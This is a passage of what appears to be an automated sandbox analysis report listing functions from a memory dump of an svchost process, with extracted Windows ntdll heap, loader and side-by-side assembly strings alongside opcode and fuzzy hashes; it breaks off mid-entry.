                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
                                                                    • API String ID: 0-761764676
                                                                    • Opcode ID: fa757d94fe8811be7e02e9e6e208bddbbbe92a8f18d0bad376be237622b57d64
                                                                    • Instruction ID: ce9a9625f476e71c852b35efcb2517c31bb16415e025f6bd00a69f6157030bd8
                                                                    • Opcode Fuzzy Hash: fa757d94fe8811be7e02e9e6e208bddbbbe92a8f18d0bad376be237622b57d64
                                                                    • Instruction Fuzzy Hash: 8D127E74E00215DBDF24CFA8C981AAEB7F8FF49714F1884AAE845EB341E7349851CB65
                                                                    Function 0363EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                    • API String ID: 0-1109411897
                                                                    • Opcode ID: ada50179064d68e9e76df560ba570b3cc2044666056b4715a352dcda5ff2da1e
                                                                    • Instruction ID: a645f34ba35d29ffbd308ebaab3d8fc28a150dd271f91b5ccc4638435b5d80d1
                                                                    • Opcode Fuzzy Hash: ada50179064d68e9e76df560ba570b3cc2044666056b4715a352dcda5ff2da1e
                                                                    • Instruction Fuzzy Hash: 8FA23875E056298BDF65CF19CD887A9B7B9AF46304F1442EAD80DAB350DB319E82CF10
                                                                    Function 0362F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                    • API String ID: 0-523794902
                                                                    • Opcode ID: 72a5aef6ef6444e9595da745d8e539337873a800b6722f11a1ecf024c2a3e55f
                                                                    • Instruction ID: 322ca20196072f33bce53155b931c741b8985e9b5cbddc862d19e15b93ee4729
                                                                    • Opcode Fuzzy Hash: 72a5aef6ef6444e9595da745d8e539337873a800b6722f11a1ecf024c2a3e55f
                                                                    • Instruction Fuzzy Hash: C742FE75608B919FC714EF28C590A2AFBE5FF89204F094A6DE8868F381D730D842CF56
                                                                    Function 0363ADE0 Relevance: 8.1, Strings: 6, Instructions: 573COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                    • API String ID: 0-4098886588
                                                                    • Opcode ID: ba60c781db9624c796876b0880fc3e603f99dfd227fa986c71e2263b01d80aef
                                                                    • Instruction ID: ad6ac6569fc788e4d372939171c662bfd6d1268261e2ddd578ef8a0af49df29f
                                                                    • Opcode Fuzzy Hash: ba60c781db9624c796876b0880fc3e603f99dfd227fa986c71e2263b01d80aef
                                                                    • Instruction Fuzzy Hash: B432A175E042698BEF22CF14CD94BEEBBB9AF46340F1841EAE449A7350D7719E818F44
                                                                    Function 0364B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                    • API String ID: 0-122214566
                                                                    • Opcode ID: 8b98c884ee7763cdcea8c0fa9e12bbbeac5b2a7a574e0a433387637bb75a6b34
                                                                    • Instruction ID: 61a59e040741913a494003336e544fdeb4c8de8bb2103f00a1675c65baf34e3b
                                                                    • Opcode Fuzzy Hash: 8b98c884ee7763cdcea8c0fa9e12bbbeac5b2a7a574e0a433387637bb75a6b34
                                                                    • Instruction Fuzzy Hash: E0C14B31E00215ABDF25CF69C881BBFBB69AF46710F184069E8869F381E7B4DD45C7A4
                                                                    Function 036663FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-792281065
                                                                    • Opcode ID: 4c1d2e7a04ecdc933ddece91727a85b4a9a4d1d6c9c034d6b9cce3b8d80b486e
                                                                    • Instruction ID: b68c1c0c0f3db365c919d15d3854d37e81bf53d2ce74437a05d76ae26da3ccad
                                                                    • Opcode Fuzzy Hash: 4c1d2e7a04ecdc933ddece91727a85b4a9a4d1d6c9c034d6b9cce3b8d80b486e
                                                                    • Instruction Fuzzy Hash: 73915A30B007149BDB35EF19ED95BAEBBA4EF41764F18812DE4106B381DBB45C01CBA4
                                                                    Function 03662674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 036A2180
                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 036A2178
                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 036A21BF
                                                                    • RtlGetAssemblyStorageRoot, xrefs: 036A2160, 036A219A, 036A21BA
                                                                    • SXS: %s() passed the empty activation context, xrefs: 036A2165
                                                                    • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 036A219F
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                    • API String ID: 0-861424205
                                                                    • Opcode ID: 027ae63fec5a9fd33bf3da33435b057ce54c82c6edc4417136aa55880b35f0c9
                                                                    • Instruction ID: e1286b9a273467c86b25e2f7ae68a3f042581395811c0b9c48785418b40d85a3
                                                                    • Opcode Fuzzy Hash: 027ae63fec5a9fd33bf3da33435b057ce54c82c6edc4417136aa55880b35f0c9
                                                                    • Instruction Fuzzy Hash: AD312836F802147BE721CA998C65F5FBF78DB95A80F094469FA14AB241D670DE01CBE1
                                                                    Function 0366C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 0366C6C3
                                                                    • Unable to build import redirection Table, Status = 0x%x, xrefs: 036A81E5
                                                                    • LdrpInitializeImportRedirection, xrefs: 036A8177, 036A81EB
                                                                    • LdrpInitializeProcess, xrefs: 0366C6C4
                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 036A8181, 036A81F5
                                                                    • Loading import redirection DLL: '%wZ', xrefs: 036A8170
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                    • API String ID: 0-475462383
                                                                    • Opcode ID: 7c478064954e2fd938fb7687bcf39ede4813842984e735763f085e740b15f587
                                                                    • Instruction ID: db67810cf4b8358810ca9bed863b29687789e513dc508bfa31e1f72894f933af
                                                                    • Opcode Fuzzy Hash: 7c478064954e2fd938fb7687bcf39ede4813842984e735763f085e740b15f587
                                                                    • Instruction Fuzzy Hash: AC310775744B459FD224EF28DD45E2ABBE4EF84B10F04056CF885AF391E660EC04CBA6
                                                                    Function 036B9C32 Relevance: 6.8, Strings: 5, Instructions: 542COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$AVRF: Verifier .dlls must not have thread locals$KnownDllPath$L$\KnownDlls32
                                                                    • API String ID: 0-3127649145
                                                                    • Opcode ID: f7528f36ef7996882a49b42605aec02799ccd89ba4be9cfd92f541c982d7d6a3
                                                                    • Instruction ID: 079f7b02c40717dd82f2f37a86bfded669839cbded2cc0aa82200cc3b98ade23
                                                                    • Opcode Fuzzy Hash: f7528f36ef7996882a49b42605aec02799ccd89ba4be9cfd92f541c982d7d6a3
                                                                    • Instruction Fuzzy Hash: 50325675A017199BDB21DF65CD88BDAB7F8FF48304F1041EAE509AB250EB70AA84CF54
                                                                    Function 03649950 Relevance: 6.7, Strings: 5, Instructions: 462COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                                    • API String ID: 0-3393094623
                                                                    • Opcode ID: 4df38a12d84b5784f3ae92eada6a23063a2eb516cbd90a3db17ff7bf2ce9e9f6
                                                                    • Instruction ID: b4bbb8a3345e8df193a233aff2847d6fbb3dccb76847ee3e3fdb4cc015cfd3f5
                                                                    • Opcode Fuzzy Hash: 4df38a12d84b5784f3ae92eada6a23063a2eb516cbd90a3db17ff7bf2ce9e9f6
                                                                    • Instruction Fuzzy Hash: E80247759483418BD720CF64C184BABFBE9BF8A704F48895EE9998B350E770D845CB92
                                                                    Function 036551EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • WindowsExcludedProcs, xrefs: 0365522A
                                                                    • Kernel-MUI-Language-Disallowed, xrefs: 03655352
                                                                    • Kernel-MUI-Number-Allowed, xrefs: 03655247
                                                                    • Kernel-MUI-Language-Allowed, xrefs: 0365527B
                                                                    • Kernel-MUI-Language-SKU, xrefs: 0365542B
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                    • API String ID: 0-258546922
                                                                    • Opcode ID: db691c9df998bc7dca5f14913f6d83fd39be106608a56654a86aac575ff5a186
                                                                    • Instruction ID: 2e24198e7618d9fd888421c9e0721b4db3869862d1ff53ce57264453007a6ab2
                                                                    • Opcode Fuzzy Hash: db691c9df998bc7dca5f14913f6d83fd39be106608a56654a86aac575ff5a186
                                                                    • Instruction Fuzzy Hash: D8F15E76D10218EFCF15DFA4C944AEEBBBDEF49610F54406AEA02AB350E7709E01CB90
                                                                    Function 036B4F40 Relevance: 6.5, Strings: 5, Instructions: 246COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                    • API String ID: 0-2518169356
                                                                    • Opcode ID: d19f665de6145a23464f17b97a3df762c7a734309cf6e7456998d0b1962578c8
                                                                    • Instruction ID: faa293ad065d6e7de36ca2f0e14ba8532ee0e66932fe4de1b3f16d417c6be6df
                                                                    • Opcode Fuzzy Hash: d19f665de6145a23464f17b97a3df762c7a734309cf6e7456998d0b1962578c8
                                                                    • Instruction Fuzzy Hash: 2191CE72D006199BCB21CFA9C981AFEB7B4EF89310F594169E912EB350D735D981CF90
                                                                    Function 0365D7B0 Relevance: 6.4, Strings: 5, Instructions: 151COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-1975516107
                                                                    • Opcode ID: e9bce0ca7d71ad87aa926909e0c09ac35583136da5c8a7dd21dab9b7836afb74
                                                                    • Instruction ID: 00efb9c74984a7da902590043fdc1eb3fbf7d88aa40c5547363a3a4106228ecf
                                                                    • Opcode Fuzzy Hash: e9bce0ca7d71ad87aa926909e0c09ac35583136da5c8a7dd21dab9b7836afb74
                                                                    • Instruction Fuzzy Hash: C451CC75E00345DFDB24EFA4C5847ADBBB1BF49318F288169E801AB3D1D778A981CB80
                                                                    Function 036276B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                    • API String ID: 0-3061284088
                                                                    • Opcode ID: 390661258646eeb5ce7db219dbb8f14cffbec3184d563b1540ed82491d4826c0
                                                                    • Instruction ID: 0332578842834aaf90e002846663bdabf86e8451aa4e08cc4e6a64e8a71b8f3b
                                                                    • Opcode Fuzzy Hash: 390661258646eeb5ce7db219dbb8f14cffbec3184d563b1540ed82491d4826c0
                                                                    • Instruction Fuzzy Hash: 28012836648A60DED229F319D40EF57BBD4DB47A70F19404DE0104F692CAE49880C928
                                                                    Function 036470C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                    • API String ID: 0-3178619729
                                                                    • Opcode ID: 3fd0cfbd61013f7919ead066e3533beb73be444fa71dbf6bd8aaf22eecdd1f7a
                                                                    • Instruction ID: 8010ee9bfdacfffd91313a7cd346c0c7c5e4772cfe80c8784da66ebd3cb2a17f
                                                                    • Opcode Fuzzy Hash: 3fd0cfbd61013f7919ead066e3533beb73be444fa71dbf6bd8aaf22eecdd1f7a
                                                                    • Instruction Fuzzy Hash: 6F139A70E00655DFDB29CF68C9807AAFBF1BF49304F1881A9D859AB381D735A946CF90
                                                                    Function 036429A0 Relevance: 6.0, Strings: 4, Instructions: 966COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                    • API String ID: 0-3126994380
                                                                    • Opcode ID: a47da5c576f6c313af6823eb3488ccba37024bf5f545430755abce98805f3fb1
                                                                    • Instruction ID: e551bf6252910c8f41355ebfbe537fcdedde3e79d5fb30c6ea545229045044a0
                                                                    • Opcode Fuzzy Hash: a47da5c576f6c313af6823eb3488ccba37024bf5f545430755abce98805f3fb1
                                                                    • Instruction Fuzzy Hash: A392CB74E042489FDB25CF68C5547AEBBF1FF09300F2884A9E899AB391D735A942CF50
                                                                    Function 03641070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                    • API String ID: 0-3570731704
                                                                    • Opcode ID: 2ab191c244494b1e27d4007cc8492eba64981564dc9d4d699c2b6f76df14784b
                                                                    • Instruction ID: 207d8bdc2e9b9ac840d5169847e68bee684e19f89c6b0ba403329769e768eb60
                                                                    • Opcode Fuzzy Hash: 2ab191c244494b1e27d4007cc8492eba64981564dc9d4d699c2b6f76df14784b
                                                                    • Instruction Fuzzy Hash: C4925775E00268CFEB25CF18C940BA9B7B9BF46314F0981EAD94AAB350D7749E81CF15
                                                                    Function 03631460 Relevance: 5.4, Strings: 4, Instructions: 385COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                    • API String ID: 0-2084224854
                                                                    • Opcode ID: d5381806d43d19562c1d1c57f69b291ed02a2a2518e180126918b30916624762
                                                                    • Instruction ID: 734c78e95ef54f98aa5f9b9c68c791cf17a07c7ee95aeb692af50f1e7bf25f1e
                                                                    • Opcode Fuzzy Hash: d5381806d43d19562c1d1c57f69b291ed02a2a2518e180126918b30916624762
                                                                    • Instruction Fuzzy Hash: 08E11F70A046419FDB28EF68C485BBABBF5EF4B310F18855DE4968B342E734E941CB60
                                                                    Function 0364A840 Relevance: 5.4, Strings: 4, Instructions: 358COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 03697D39
                                                                    • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 03697D03
                                                                    • SsHd, xrefs: 0364A885
                                                                    • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 03697D56
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                                    • API String ID: 0-2905229100
                                                                    • Opcode ID: 704b97210f796c4f7b329dfb576abca5c39fa37ad633598925c68217e32c54c6
                                                                    • Instruction ID: c7a2d3143bf4a17592fb71fa2447cf15ff0a1dbaead91b037836ee3d31c60cfb
                                                                    • Opcode Fuzzy Hash: 704b97210f796c4f7b329dfb576abca5c39fa37ad633598925c68217e32c54c6
                                                                    • Instruction Fuzzy Hash: 2ED17A35E50219AFDF24CFA8C980AADF7B5FF48310F19416AE845AB351D771E981CBA0
                                                                    Function 03643D40 Relevance: 5.4, Strings: 3, Instructions: 1603COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                    • API String ID: 0-3178619729
                                                                    • Opcode ID: c911a3fe964cba207369e77acec52996926706a5d937dba918cbb5ac7797f165
                                                                    • Instruction ID: 1d1a713801701c58b7fb724b231d1dd4a520da7f9ed6cb0412308eb216dc7ddf
                                                                    • Opcode Fuzzy Hash: c911a3fe964cba207369e77acec52996926706a5d937dba918cbb5ac7797f165
                                                                    • Instruction Fuzzy Hash: B9E2BF74E006158FDB29CF69C591BAAFBF1FF49304F188199D849AB385DB34A846CF90
                                                                    Function 0363A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                    • API String ID: 0-379654539
                                                                    • Opcode ID: fc053538af66c696dd4f307808f14be0ec8fefc8c59e7ac7b50d88d981995292
                                                                    • Instruction ID: a74868723c90a63a18362ad2b71d5765b5d400c7e71879abf08eced96c4aa607
                                                                    • Opcode Fuzzy Hash: fc053538af66c696dd4f307808f14be0ec8fefc8c59e7ac7b50d88d981995292
                                                                    • Instruction Fuzzy Hash: 25C18774508386DFDB10CF98C144B6AB7E8BF86704F04896AF8D68B351E334C94ADB66
                                                                    Function 03640C00 Relevance: 5.3, Strings: 4, Instructions: 260COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 036954ED
                                                                    • HEAP[%wZ]: , xrefs: 036954D1, 03695592
                                                                    • HEAP: , xrefs: 036954E0, 036955A1
                                                                    • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 036955AE
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                    • API String ID: 0-1657114761
                                                                    • Opcode ID: 7f96ca36c8a509b0e9a803b4fbb077a9f73c1c66a7e328f4b82a1918980512f6
                                                                    • Instruction ID: a117a49997abac40d68902d0d6b1d5ca18416cb40009dac25e4bbfbc41b1a832
                                                                    • Opcode Fuzzy Hash: 7f96ca36c8a509b0e9a803b4fbb077a9f73c1c66a7e328f4b82a1918980512f6
                                                                    • Instruction Fuzzy Hash: 81A1F134A04625DFDB24DF28C940BBAFBE5EF46300F18856ED6968B782D774A845CB90
                                                                    Function 0366273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 036A21D9, 036A22B1
                                                                    • SXS: %s() passed the empty activation context, xrefs: 036A21DE
                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 036A22B6
                                                                    • .Local, xrefs: 036628D8
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                    • API String ID: 0-1239276146
                                                                    • Opcode ID: 51a3dceae6a4addfc07953bcc29b0a7d2fa2f15504eaaeb80e2fcacf3d540e5c
                                                                    • Instruction ID: 905c521ab44aaf4e7a28f89affa1539bfd952b7c7fe505270f7eeb2590cbdd8d
                                                                    • Opcode Fuzzy Hash: 51a3dceae6a4addfc07953bcc29b0a7d2fa2f15504eaaeb80e2fcacf3d540e5c
                                                                    • Instruction Fuzzy Hash: 5CA1C135940229DFCB24CF69CD98BA9B3B4BF58354F1849E9D848AB351D7309E81CF94
                                                                    Function 0362F626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                    • API String ID: 0-2586055223
                                                                    • Opcode ID: 8ded01df173ea63816c809eff459c024424e26014d3d46bcb10b88773a3aa357
